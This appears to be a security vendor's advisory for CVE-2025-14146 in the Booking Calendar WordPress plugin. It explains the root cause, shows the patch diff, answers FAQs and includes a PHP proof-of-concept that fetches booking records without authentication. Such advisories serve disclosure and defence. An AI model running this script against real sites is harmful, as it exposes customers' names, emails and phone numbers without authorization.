What is CVE-2025-14146?

CVE-2025-14146 is a medium severity vulnerability in the Booking Calendar plugin for WordPress, affecting versions up to 10.14.10. It allows unauthenticated attackers to access sensitive booking information through a flaw in the AJAX action ‘WPBC_FLEXTIMELINE_NAV’, where nonce verification is not properly enforced.

How does this vulnerability work?

The vulnerability occurs due to the conditional disabling of nonce verification based on plugin settings. When certain options are enabled, attackers can send crafted requests to the AJAX endpoint, retrieving sensitive customer data such as names, email addresses, and booking details without needing authentication.

Who is affected by this vulnerability?

All users of the Booking Calendar plugin for WordPress who are running versions 10.14.10 or earlier are affected. This includes both site administrators and visitors who may have access to the front-end timeline view.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Booking Calendar plugin installed. If it is 10.14.10 or earlier, your site is at risk. Additionally, you can review your plugin settings to see if the ‘booking_is_show_popover_in_timeline_front_end’ option is enabled.

What are the risks associated with this vulnerability?

The risks include exposure of personally identifiable information (PII) such as customer names, email addresses, and phone numbers. This data can be used for phishing attacks, spam, or other malicious activities, violating user privacy and trust.

How can I fix or mitigate this issue?

To mitigate this vulnerability, update the Booking Calendar plugin to version 10.14.11 or later, where the issue has been patched. Additionally, review your plugin settings to ensure that unnecessary features are disabled.

What does the CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the risk is not critical, it is significant enough to warrant prompt attention and remediation to protect sensitive data.

What is nonce verification and why is it important?

Nonce verification is a security measure used in WordPress to ensure that requests made to the server are legitimate and originate from authenticated users. It helps prevent unauthorized actions and data exposure, making it a critical component in protecting sensitive information.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an attacker can exploit the vulnerability by sending a crafted POST request to the vulnerable AJAX endpoint. The provided PHP code shows how to retrieve sensitive booking data without authentication, highlighting the risk posed by the vulnerability.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the timeline popover feature in the plugin settings if available. Additionally, monitor your site for any suspicious activity and review access logs for unauthorized requests.

Are there any other vulnerabilities associated with this plugin?

While CVE-2025-14146 is a specific vulnerability, it is essential to regularly review all plugins for known vulnerabilities. Check the plugin’s changelog and security advisories to stay informed about potential risks and updates.

Can this vulnerability be exploited remotely?

Yes, this vulnerability can be exploited remotely as it does not require authentication. Attackers can send requests from anywhere on the internet, making it crucial for administrators to apply the patch and secure their installations.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14146: Booking Calendar <= 10.14.10 – Unauthenticated Sensitive Information Exposure (booking)

CVE ID CVE-2025-14146

Plugin booking

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 10.14.10

Patched Version 10.14.11

Disclosed January 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14146:
This vulnerability is an unauthenticated sensitive information exposure in the Booking Calendar WordPress plugin. The flaw resides in the timeline view component and allows attackers to extract detailed booking records. The CVSS score of 5.3 reflects a moderate severity impact on confidentiality.

Atomic Edge research identifies the root cause as an insufficient authorization check in the `WPBC_FLEXTIMELINE_NAV` AJAX action handler. The file `booking/core/timeline/v2/wpbc-class-timeline_v2.php` contains the vulnerable logic. At lines 3333-3348, the code conditionally enables a popover feature showing booking details based on the `booking_is_show_popover_in_timeline_front_end` option. The default `booking_is_nonce_at_front_end` setting is ‘Off’, which disables nonce verification for front-end AJAX requests. The original patch in version 10.14.10.1 added a check for `get_current_user_id()`, but this check was placed inside an `else` block that only executed if the `booking_is_show_popover_in_timeline_front_end` option was ‘On’. This created a logic flaw where unauthenticated users could still trigger the data exposure if the option was enabled.

Exploitation requires an attacker to send a crafted POST request to the WordPress `/wp-admin/admin-ajax.php` endpoint. The request must set the `action` parameter to `WPBC_FLEXTIMELINE_NAV`. No authentication or nonce is required due to the default plugin configuration. The attacker can include parameters like `view_days_num` and `scroll_start_date` to navigate the timeline and retrieve booking data. The server response will contain sensitive customer information, including names, email addresses, phone numbers, and booking details, in JSON format.

The patch in version 10.14.11.1 introduces a new global constant, `WPBC_DISABLE_POPOVER_IN_TIMELINE`, defined as `true` in `booking/wpdev-booking.php` at line 86. The logic in `wpbc-class-timeline_v2.php` is restructured. A new conditional at line 3335 checks this constant first. If it is true, the `$is_show_popover_in_timeline` variable is immediately set to `false`, bypassing all subsequent option checks. This change completely disables the popover feature on the front-end timeline, eliminating the data exposure vector regardless of plugin settings or user authentication state.

Successful exploitation leads to the exposure of all booking data accessible via the front-end timeline view. Attackers can harvest personally identifiable information (PII) such as customer names, email addresses, and phone numbers. They can also obtain booking details, which may include dates, times, services booked, and custom form field submissions. This data breach violates user privacy and could facilitate phishing campaigns, spam, or further targeted attacks.

Differential between vulnerable and patched code

Code Diff

--- a/booking/core/timeline/v2/wpbc-class-timeline_v2.php
+++ b/booking/core/timeline/v2/wpbc-class-timeline_v2.php
@@ -3330,21 +3330,27 @@

 	// For client Timeline.
 	if ( $is_frontend ) {
-		$is_show_popover_in_timeline = ( get_bk_option( 'booking_is_show_popover_in_timeline_front_end' ) == 'On' ) ? true : false;
-		if ( ! class_exists( 'wpdev_bk_personal' ) ) {
-			$is_show_popover_in_timeline = false;    // FixIn: 10.14.9.2.
-		}
-		// FixIn: 10.14.10.1.
-		if ( 0 === get_current_user_id() ) {
-			// User  is not logged in.
+
+		// FixIn: 10.14.11.1.
+		if ( WPBC_DISABLE_POPOVER_IN_TIMELINE ) {
 			$is_show_popover_in_timeline = false;
 		} else {
-			// 'subscriber' > 'contributor' > 'author' > 'editor' > 'administrator'.
-			$minimum_user_role = get_bk_option( 'booking_min_user_role_for_popover_in_timeline' );
-			$minimum_user_role = ( ! empty( $minimum_user_role ) ) ? $minimum_user_role : 'administrator';
-			if ( ! wpbc_is_current_user_have_this_role( $minimum_user_role ) ) {
-				// User  has lower role, than  checked.
+			$is_show_popover_in_timeline = ( get_bk_option( 'booking_is_show_popover_in_timeline_front_end' ) == 'On' ) ? true : false;
+			if ( ! class_exists( 'wpdev_bk_personal' ) ) {
+				$is_show_popover_in_timeline = false;    // FixIn: 10.14.9.2.
+			}
+			// FixIn: 10.14.10.1.
+			if ( 0 === get_current_user_id() ) {
+				// User  is not logged in.
 				$is_show_popover_in_timeline = false;
+			} else {
+				// 'subscriber' > 'contributor' > 'author' > 'editor' > 'administrator'.
+				$minimum_user_role = get_bk_option( 'booking_min_user_role_for_popover_in_timeline' );
+				$minimum_user_role = ( ! empty( $minimum_user_role ) ) ? $minimum_user_role : 'administrator';
+				if ( ! wpbc_is_current_user_have_this_role( $minimum_user_role ) ) {
+					// User  has lower role, than  checked.
+					$is_show_popover_in_timeline = false;
+				}
 			}
 		}
 	}
--- a/booking/wpdev-booking.php
+++ b/booking/wpdev-booking.php
@@ -7,7 +7,7 @@
 Author URI: https://wpbookingcalendar.com/
 Text Domain: booking
 Domain Path: /languages/
-Version: 10.14.10
+Version: 10.14.11
 License: GPLv2 or later
 */

@@ -34,7 +34,7 @@


 if ( ! defined( 'WP_BK_VERSION_NUM' ) ) {
-	define( 'WP_BK_VERSION_NUM', '10.14.10' );
+	define( 'WP_BK_VERSION_NUM', '10.14.11' );
 }
 if ( ! defined( 'WP_BK_MINOR_UPDATE' ) ) {
 	define( 'WP_BK_MINOR_UPDATE',  true );
@@ -83,6 +83,11 @@
 	define( 'WPBC_IS_PLAYGROUND', ( isset( $_SERVER['SERVER_SOFTWARE'] ) && ( 'PHP.wasm' === $_SERVER['SERVER_SOFTWARE'] ) ) );
 }

+// Intentionally completely disable showing booking deatils in Timeline view on Front-End side.							// FixIn: 10.14.11.1.
+if ( ! defined( 'WPBC_DISABLE_POPOVER_IN_TIMELINE' ) ) {
+	define( 'WPBC_DISABLE_POPOVER_IN_TIMELINE', true );
+}
+
 // ---------------------------------------------------------------------------------------------------------------------
 // ==  DEBUG  CONSTANTS  ==
 // ---------------------------------------------------------------------------------------------------------------------

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14146 - Booking Calendar <= 10.14.10 - Unauthenticated Sensitive Information Exposure
<?php

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';

// The vulnerable AJAX action
$post_data = array(
    'action' => 'WPBC_FLEXTIMELINE_NAV',
    // Additional parameters to navigate the timeline. Adjust as needed.
    'view_days_num' => '30',
    'scroll_start_date' => date('Y-m-d'),
    'wh_booking_type' => '1'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); // For testing only

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200 && !empty($response)) {
    $json_response = json_decode($response, true);
    if (json_last_error() === JSON_ERROR_NONE) {
        echo "[+] Request successful.n";
        echo "[+] Response contains booking data.n";
        // Print a sample of the data structure
        print_r($json_response);
    } else {
        echo "[+] Received non-JSON response (may indicate error or patched site).n";
        echo "Response: " . htmlspecialchars($response) . "n";
    }
} else {
    echo "[-] Request failed with HTTP code: $http_coden";
}

?>

Frequently Asked Questions

What is CVE-2025-14146?
Understanding the vulnerability
CVE-2025-14146 is a medium severity vulnerability in the Booking Calendar plugin for WordPress, affecting versions up to 10.14.10. It allows unauthenticated attackers to access sensitive booking information through a flaw in the AJAX action ‘WPBC_FLEXTIMELINE_NAV’, where nonce verification is not properly enforced.
How does this vulnerability work?
Mechanics of the exploitation
The vulnerability occurs due to the conditional disabling of nonce verification based on plugin settings. When certain options are enabled, attackers can send crafted requests to the AJAX endpoint, retrieving sensitive customer data such as names, email addresses, and booking details without needing authentication.
Who is affected by this vulnerability?
Identifying the impacted users
All users of the Booking Calendar plugin for WordPress who are running versions 10.14.10 or earlier are affected. This includes both site administrators and visitors who may have access to the front-end timeline view.
How can I check if my site is vulnerable?
Steps to verify vulnerability status
To check if your site is vulnerable, verify the version of the Booking Calendar plugin installed. If it is 10.14.10 or earlier, your site is at risk. Additionally, you can review your plugin settings to see if the ‘booking_is_show_popover_in_timeline_front_end’ option is enabled.
What are the risks associated with this vulnerability?
Potential impacts of exploitation
The risks include exposure of personally identifiable information (PII) such as customer names, email addresses, and phone numbers. This data can be used for phishing attacks, spam, or other malicious activities, violating user privacy and trust.
How can I fix or mitigate this issue?
Recommended actions for administrators
To mitigate this vulnerability, update the Booking Calendar plugin to version 10.14.11 or later, where the issue has been patched. Additionally, review your plugin settings to ensure that unnecessary features are disabled.
What does the CVSS score of 5.3 indicate?
Understanding severity ratings
A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the risk is not critical, it is significant enough to warrant prompt attention and remediation to protect sensitive data.
What is nonce verification and why is it important?
Role of nonce in security
Nonce verification is a security measure used in WordPress to ensure that requests made to the server are legitimate and originate from authenticated users. It helps prevent unauthorized actions and data exposure, making it a critical component in protecting sensitive information.
How does the proof of concept demonstrate the vulnerability?
Insights from the provided code
The proof of concept illustrates how an attacker can exploit the vulnerability by sending a crafted POST request to the vulnerable AJAX endpoint. The provided PHP code shows how to retrieve sensitive booking data without authentication, highlighting the risk posed by the vulnerability.
What should I do if I cannot update the plugin immediately?
Temporary measures to consider
If immediate updates are not possible, consider disabling the timeline popover feature in the plugin settings if available. Additionally, monitor your site for any suspicious activity and review access logs for unauthorized requests.
Are there any other vulnerabilities associated with this plugin?
Assessing overall security posture
While CVE-2025-14146 is a specific vulnerability, it is essential to regularly review all plugins for known vulnerabilities. Check the plugin’s changelog and security advisories to stay informed about potential risks and updates.
Can this vulnerability be exploited remotely?
Understanding the attack vector
Yes, this vulnerability can be exploited remotely as it does not require authentication. Attackers can send requests from anywhere on the internet, making it crucial for administrators to apply the patch and secure their installations.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations